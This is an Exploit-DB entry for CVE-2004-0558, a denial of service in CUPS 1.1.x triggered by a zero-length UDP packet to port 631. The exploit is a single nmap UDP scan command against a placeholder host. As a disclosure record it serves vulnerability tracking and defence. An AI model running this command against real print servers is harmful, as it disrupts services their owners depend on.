CUPS 1.1.x UDP Packet Remote Denial of Service Vulnerability

2004-09-15T00:00:00
ID EDB-ID:24599
Type exploitdb
Reporter Alvaro Martinez Echevarria
Modified 2004-09-15T00:00:00

Description

CUPS 1.1.x UDP Packet Remote Denial Of Service Vulnerability. CVE-2004-0558. Dos exploit for linux platform

                                        
                                            source: http://www.securityfocus.com/bid/11183/info

CUPS is prone to a remotely exploitable denial of service vulnerability that may be triggered through port 631 by a zero-length UDP packet.

nmap -sU -p 631 example.com